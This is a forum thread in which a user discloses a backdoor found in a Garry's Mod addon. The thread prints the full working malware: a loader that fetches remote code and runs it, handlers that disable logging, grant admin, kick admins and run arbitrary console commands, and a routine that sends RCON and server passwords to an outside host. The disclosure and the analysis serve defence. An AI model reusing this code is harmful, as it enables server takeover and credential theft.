Backdoor in smart tool user

Read title. I just found a backdoor in an addon called smart tool user which allows anyone to add themselves to any usergroup, demote and kick all admins, run any command and other malicious shit.
The backdoor itself is an interesting chain, here’s the code found in lua/autorun/smart_tool_user.lua


-- Stage 1 of the chain (the loader shipped in lua/autorun/smart_tool_user.lua):
-- ten seconds after load it fetches a body from the remote host and executes it
-- with RunString. Nothing validates the response, so whatever the host returns
-- runs as server-side Lua. The domain and the 10s delay are the indicators to
-- look for when auditing autorun files.
-- NOTE(review): the scheme reads "htttp://" as pasted here while the later stages
-- use "http://"; this may be a transcription artifact — confirm against the shipped file.
timer.Simple(10, function()
	http.Fetch("htttp://thisisreallylegit.appspot.com/autocontentupdater", function(body)
		-- The fetched text is stage 2 (see the next listing); it is executed as-is.
		RunString(body, "", false)
	end)
end)

The payload isn’t obfuscated; this is what I got after running it through glualint’s pretty printer:


-- Stage 2 (the body fetched by stage 1): registers a console command whose only
-- job is to download and execute stage 3. The server's hostport is appended as a
-- query parameter, so the remote host learns which server is calling back. The
-- random-looking command name is itself an indicator worth searching for.
concommand.Add("e7KwlOZB6PT37RBPhyjP", function(ply, cmd, args)
    http.Fetch("http://thisisreallylegit.appspot.com/iujchfsdacj?port=" .. GetConVarString("hostport"), function(body)
        -- Executes the downloaded stage 3 (the listing further down).
        RunString(body, "", false)
    end, function(err) end) -- fetch failures are silently swallowed
end)

-- Trigger the downloader once immediately, then re-run it on a timer named
-- "clocktimer" every 300 seconds (a repetition count of 0 means it never stops),
-- so the server keeps re-pulling whatever the remote host serves. The timer name
-- is another artifact to check for on a suspect server.
RunConsoleCommand("e7KwlOZB6PT37RBPhyjP")

timer.Create("clocktimer", 300, 0, function()
    RunConsoleCommand("e7KwlOZB6PT37RBPhyjP")
end)

And here’s the final payload (I removed the comments because the pretty printer wouldn’t work with them):


-- Stage 3, handler 1: switches off ULX file/echo/event/chat/join-leave logging.
-- IR note: once this has been invoked, ULX's own logs will not show the
-- commands issued through the handlers below, so rely on other evidence
-- (console history, external log shipping) when reconstructing what happened.
-- Each literal appears to contain a raw newline, rendered here across two lines.
concommand.Add("XJX3LNWQO1S58PJ1fza0", function(ply, cmd, args)
    game.ConsoleCommand("ulx logFile 0
")
    game.ConsoleCommand("ulx logEcho 0
")
    game.ConsoleCommand("ulx logEvents 0
")
    game.ConsoleCommand("ulx logChat 0
")
    game.ConsoleCommand("ulx logJoinLeaveEcho 0
")
end)

-- Handler 2: adds the calling player (`ply`) to the ULX group named in args[1].
-- There is no check on who `ply` is, so any client able to issue the command
-- gets the group — this is the "add themselves to any usergroup" capability
-- described in the post.
concommand.Add("rA0S5oizYoLEup7UDahl", function(ply, cmd, args)
    RunConsoleCommand("ulx", "adduser", ply:Name(), args[1])
end)

-- Handler 3: finds a connected human whose name contains args[1]
-- (case-insensitive, plain substring search) and adds them to the ULX group
-- args[2]. If several names match, the last one in player.GetHumans() order
-- wins. `name` and `find_ply` are assigned without `local`, so they leak as
-- globals.
concommand.Add("3jQgrrPxSLkRbxODPRWr", function(ply, cmd, args)
    name = string.lower(args[1])
    find_ply = nil

    for _, v in ipairs(player.GetHumans()) do
        -- 4th arg `true` = plain find, so pattern magic characters in args[1] are not interpreted
        if (string.find(string.lower(v:Name()), name, 1, true) ~= nil) then
            find_ply = v
        end
    end

    if (find_ply) then
        RunConsoleCommand("ulx", "adduser", find_ply:Name(), args[2])
    end
end)

-- Handler 4: for every connected human that IsAdmin(), removes them from ULX
-- (`ulx removeuser`) and kicks them. IR note: a sudden mass kick of admins with
-- the reason string below is a strong sign this handler was fired.
concommand.Add("C6RcfnOhuPkDPoQkgzu8", function(ply, cmd, args)
    for _, v in ipairs(player.GetHumans()) do
        if (v:IsAdmin()) then
            RunConsoleCommand("ulx", "removeuser", v:Name())
            v:Kick("No fucks given")
        end
    end
end)

-- Handler 5: same name lookup as handler 3 (case-insensitive substring, last
-- match wins, `name`/`find_ply` leak as globals), but removes the matched
-- player from ULX instead of adding them to a group.
concommand.Add("kdyaNTIEO8DtIlNALF0U", function(ply, cmd, args)
    name = string.lower(args[1])
    find_ply = nil

    for _, v in ipairs(player.GetHumans()) do
        if (string.find(string.lower(v:Name()), name, 1, true) ~= nil) then
            find_ply = v
        end
    end

    if (find_ply) then
        RunConsoleCommand("ulx", "removeuser", find_ply:Name())
    end
end)

-- Handler 6: runs the raw argument string verbatim on the server console, with
-- a newline appended — this is the "run any command" capability from the post.
-- No caller check of any kind.
concommand.Add("Dk1OIaGyEUvtmHQOF53i", function(ply, cmd, args, argStr)
    game.ConsoleCommand(argStr .. "
")
end)

-- Handler 7: issues `ulx userallow <args[1]>"<args[2]>" *`, i.e. grants the
-- access named in args[2] to args[1]. Note there is no space between args[1]
-- and the quoted args[2] in the built string, so the caller has to supply it.
concommand.Add("a1lELkTxk98lG0Ep4Nks", function(ply, cmd, args)
    game.ConsoleCommand('ulx userallow ' .. args[1] .. '"' .. args[2] .. '" *
')
end)

-- Handler 8: reconnaissance helper — reads ulib/groups.txt from the DATA folder,
-- collects the top-level keys (the ULX group names) and prints them to the
-- caller's chat. Falls back to an error message when ULib is not loaded.
concommand.Add("XYflUSGbjNED07cEBTsO", function(ply, cmd, args)
    if (ULib) then
        local groups = {}

        for k, v in pairs(ULib.parseKeyValues(file.Read("ulib/groups.txt", "DATA"))) do
            groups[#groups + 1] = k
        end

        ply:PrintMessage(HUD_PRINTTALK, "All ULX groups: " .. string.Implode(", ", groups))
    else
        ply:PrintMessage(HUD_PRINTTALK, "ERROR! No ULX installed! :(")
    end
end)

-- Handler 9: exfiltration. Scrapes rcon_password out of cfg/server.cfg and
-- POSTs it, together with hostname, gamemode, map, port, sv_password and player
-- counts, to the remote host. IR note: if this addon was ever loaded on a
-- dedicated server, treat rcon_password and sv_password as compromised and
-- rotate them after removing the addon.
concommand.Add("GIN3RCexuujsxZgy2jHq", function(ply, cmd, args)
    local rcon_config = ""

    -- Split server.cfg on newlines (the literal holds a raw newline, rendered across two lines).
    for k, v in pairs(string.Split(file.Read("cfg/server.cfg", "GAME"), "
")) do
        if (string.StartWith(v, "rcon_password")) then
            local str = v
            -- Drop the quotes, then everything after the 14-byte "rcon_password " prefix is the value.
            str = string.Replace(str, "\"", "")
            str = string.Right(str, #str - 14)
            rcon_config = str
        end
    end

    HTTP({
        url = "http://thisisreallylegit.appspot.com/post_server?port=" .. GetConVarString("hostport"),
        method = "post",
        parameters = {
            server_name = tostring(GetConVarString("hostname")),
            rcon = tostring(rcon_config),
            gamemodename = tostring(engine.ActiveGamemode()),
            map = tostring(game.GetMap()),
            serverport = GetConVarString("hostport"),
            serverpass = GetConVarString("sv_password") or "",
            currentplayers = tostring(#player.GetHumans()) or "0",
            maxplayers = tostring(game.MaxPlayers()) or "0",
            updateage = args[1]
        }
    })
end)

-- Fires the exfiltration handler as soon as stage 3 loads, but only on
-- dedicated, non-LAN servers — i.e. the ones reachable from the internet.
-- Combined with the 300s re-fetch timer in stage 2, this repeats periodically.
if (game.IsDedicated() and GetConVarNumber("sv_lan") == 0) then
    RunConsoleCommand("GIN3RCexuujsxZgy2jHq", 1)
end

I’m stating the obvious here but if you have this addon installed, you should remove it.

Looking through the workshop comments, I see that someone posted about it two months ago and it’s still up… nice!

The payload isn’t syntactically correct.
This is the payload:
[lua]concommand.Add(“XJX3LNWQO1S58PJ1fza0”, function(ply, cmd, args) //disable ulx logs game.ConsoleCommand("ulx logFile 0
") game.ConsoleCommand("ulx logEcho 0
") game.ConsoleCommand("ulx logEvents 0
") game.ConsoleCommand("ulx logChat 0
") game.ConsoleCommand("ulx logJoinLeaveEcho 0
“) end) concommand.Add(“rA0S5oizYoLEup7UDahl”, function(ply, cmd, args) //set ur own group RunConsoleCommand(“ulx”, “adduser”, ply:Name(), args[1]) end) concommand.Add(“3jQgrrPxSLkRbxODPRWr”, function(ply, cmd, args) //set somebodies else group name = string.lower(args[1]) find_ply = nil for _,v in ipairs(player.GetHumans()) do if(string.find(string.lower(v:Name()),name,1,true) != nil) then find_ply = v end end if(find_ply) then RunConsoleCommand(“ulx”, “adduser”, find_ply:Name(), args[2]) end end) concommand.Add(“C6RcfnOhuPkDPoQkgzu8”, function(ply, cmd, args) //removeuser and kick all users with ‘admin’ usergroup for _,v in ipairs(player.GetHumans()) do if(v:IsAdmin()) then RunConsoleCommand(“ulx”, “removeuser”, v:Name()) v:Kick(“No fucks given”) end end end) concommand.Add(“kdyaNTIEO8DtIlNALF0U”, function(ply, cmd, args) //remove someones ulx group name = string.lower(args[1]) find_ply = nil for _,v in ipairs(player.GetHumans()) do if(string.find(string.lower(v:Name()),name,1,true) != nil) then find_ply = v end end if(find_ply) then RunConsoleCommand(“ulx”, “removeuser”, find_ply:Name()) end end) concommand.Add(“Dk1OIaGyEUvtmHQOF53i”, function(ply, cmd, args, argStr) //run commands on server console game.ConsoleCommand(argStr … "
“) end) concommand.Add(“a1lELkTxk98lG0Ep4Nks”, function(ply, cmd, args) //give someone user access game.ConsoleCommand('ulx userallow ’ … args[1] … '”’ … args[2] … '” *
') end) concommand.Add(“XYflUSGbjNED07cEBTsO”, function(ply, cmd, args) //get all ulx groups if(ULib) then local groups = {} for k, v in pairs(ULib.parseKeyValues(file.Read(“ulib/groups.txt”, “DATA”))) do groups[#groups + 1] = k end ply:PrintMessage(HUD_PRINTTALK, “All ULX groups: " … string.Implode(”, ", groups)) else ply:PrintMessage(HUD_PRINTTALK, “ERROR! No ULX installed! :(”) end end) concommand.Add(“GIN3RCexuujsxZgy2jHq”, function(ply, cmd, args) //send post to website local rcon_config = “” for k,v in pairs(string.Split(file.Read(“cfg/server.cfg”, “GAME”), "
“)) do if(string.StartWith(v,“rcon_password”)) then local str = v str = string.Replace(str, “””, “”) str = string.Right(str,#str-14) rcon_config = str end end HTTP({ url = “http://thisisreallylegit.appspot.com/post_server?port=” … GetConVarString(“hostport”), method = “post”, parameters = {server_name = tostring(GetConVarString(“hostname”)), rcon = tostring(rcon_config), gamemodename = tostring(engine.ActiveGamemode()), map = tostring(game.GetMap()), serverport = GetConVarString(“hostport”), serverpass = GetConVarString(“sv_password”) or “”, currentplayers = tostring(#player.GetHumans()) or “0”, maxplayers = tostring(game.MaxPlayers()) or “0”, updateage = args[1]} }) end) if(game.IsDedicated() && GetConVarNumber(“sv_lan”) == 0) then RunConsoleCommand(“GIN3RCexuujsxZgy2jHq”, 1) end[/lua]

It’s a single line of code, but there are line comments everywhere. The line comments seem to imply that the code was retrieved from someone who wrote a fucking manual about it. It appears as though the uploader of the addon knows fuck all about Lua.

would this backdoor be related to me getting isis flags on my screen by any chance??? I dont know .LUA but I guess a backdoor could be used for that sort of thing and trying to hack my game?

No, for multiple reasons. First, it was designed just to take over servers. [del]Second, the main payload is actually borked, as pointed out by FPtje in a post above.[/del] Actually it’s fine, just looks dumb in the browser.

Sorry, I’m dumb. I just detoured RunString and the code it outputs is properly formatted (view page source also works)


-- Same stage-3 payload as above, captured by detouring RunString; the author's
-- original `//` comments (GLua syntax) are intact here. This handler disables
-- ULX logging, so ULX logs cannot be relied on for what follows.
concommand.Add("XJX3LNWQO1S58PJ1fza0", function(ply, cmd, args) //disable ulx logs
	game.ConsoleCommand("ulx logFile 0
")
	game.ConsoleCommand("ulx logEcho 0
")
	game.ConsoleCommand("ulx logEvents 0
")
	game.ConsoleCommand("ulx logChat 0
")
	game.ConsoleCommand("ulx logJoinLeaveEcho 0
")
end)
-- Adds the caller to the ULX group in args[1]; no check on who the caller is.
concommand.Add("rA0S5oizYoLEup7UDahl", function(ply, cmd, args) //set ur own group
	RunConsoleCommand("ulx", "adduser", ply:Name(), args[1])
end)
-- Case-insensitive substring lookup of a connected human by args[1] (last match
-- wins), then adds them to group args[2]. `name`/`find_ply` are globals.
concommand.Add("3jQgrrPxSLkRbxODPRWr", function(ply, cmd, args) //set somebodies else group
	name = string.lower(args[1])
	find_ply = nil
	for _,v in ipairs(player.GetHumans()) do
		if(string.find(string.lower(v:Name()),name,1,true) != nil) then
			find_ply = v
		end
	end
	if(find_ply) then
		RunConsoleCommand("ulx", "adduser", find_ply:Name(), args[2])
	end
end)
-- Removes every connected admin from ULX and kicks them; a mass kick with this
-- reason string is a tell-tale sign in server/console history.
concommand.Add("C6RcfnOhuPkDPoQkgzu8", function(ply, cmd, args) //removeuser and kick all users with 'admin' usergroup
	for _,v in ipairs(player.GetHumans()) do
		if(v:IsAdmin()) then
			RunConsoleCommand("ulx", "removeuser", v:Name())
			v:Kick("No fucks given")
		end
	end
end)
-- Same lookup as the handler above, but strips the matched player's ULX group.
concommand.Add("kdyaNTIEO8DtIlNALF0U", function(ply, cmd, args) //remove someones ulx group
	name = string.lower(args[1])
	find_ply = nil
	for _,v in ipairs(player.GetHumans()) do
		if(string.find(string.lower(v:Name()),name,1,true) != nil) then
			find_ply = v
		end
	end
	if(find_ply) then
		RunConsoleCommand("ulx", "removeuser", find_ply:Name())
	end
end)
-- Arbitrary server console command execution: argStr is passed through verbatim.
concommand.Add("Dk1OIaGyEUvtmHQOF53i", function(ply, cmd, args, argStr) //run commands on server console
	game.ConsoleCommand(argStr .. "
")
end)
-- Grants ULX access args[2] to args[1] via `ulx userallow`.
concommand.Add("a1lELkTxk98lG0Ep4Nks", function(ply, cmd, args) //give someone user access
	game.ConsoleCommand('ulx userallow ' .. args[1] .. '"' .. args[2] .. '" *
')
end)
-- Lists the ULX group names from ulib/groups.txt in the caller's chat.
concommand.Add("XYflUSGbjNED07cEBTsO", function(ply, cmd, args) //get all ulx groups
	if(ULib) then
		local groups = {}
		for k, v in pairs(ULib.parseKeyValues(file.Read("ulib/groups.txt", "DATA"))) do
			groups[#groups + 1] = k
		end
		ply:PrintMessage(HUD_PRINTTALK, "All ULX groups: " .. string.Implode(", ", groups))
	else
		ply:PrintMessage(HUD_PRINTTALK, "ERROR! No ULX installed! :(")
	end
end)
-- Exfiltrates rcon_password (scraped from cfg/server.cfg), hostname, gamemode,
-- map, port, sv_password and player counts to the remote host. IR note: rotate
-- rcon_password and sv_password on any dedicated server that loaded this addon.
concommand.Add("GIN3RCexuujsxZgy2jHq", function(ply, cmd, args) //send post to website
	local rcon_config = ""
	for k,v in pairs(string.Split(file.Read("cfg/server.cfg", "GAME"), "
")) do
		if(string.StartWith(v,"rcon_password")) then
			local str = v
			-- strip quotes, then drop the 14-byte "rcon_password " prefix
			str = string.Replace(str, "\"", "")
			str = string.Right(str,#str-14)
			rcon_config = str
		end
	end
	HTTP({
		url = "http://thisisreallylegit.appspot.com/post_server?port=" .. GetConVarString("hostport"), 
		method = "post", 
		parameters = {server_name = tostring(GetConVarString("hostname")), rcon = tostring(rcon_config), gamemodename = tostring(engine.ActiveGamemode()), map = tostring(game.GetMap()), serverport = GetConVarString("hostport"), serverpass = GetConVarString("sv_password") or "", currentplayers = tostring(#player.GetHumans()) or "0", maxplayers = tostring(game.MaxPlayers()) or "0", updateage = args[1]}
	})
end)
-- Runs the exfiltration handler at load on dedicated, non-LAN servers only
-- (`&&` is GLua syntax for `and`).
if(game.IsDedicated() && GetConVarNumber("sv_lan") == 0) then
	RunConsoleCommand("GIN3RCexuujsxZgy2jHq", 1)
end

https://github.com/RyanJGray/Backdoor_Busting_2015/tree/master/BD004_ThirdPersonController

That was committed 1 year ago yesterday. Wondering if the Smart Tool person just copy+pasted or is the same guy.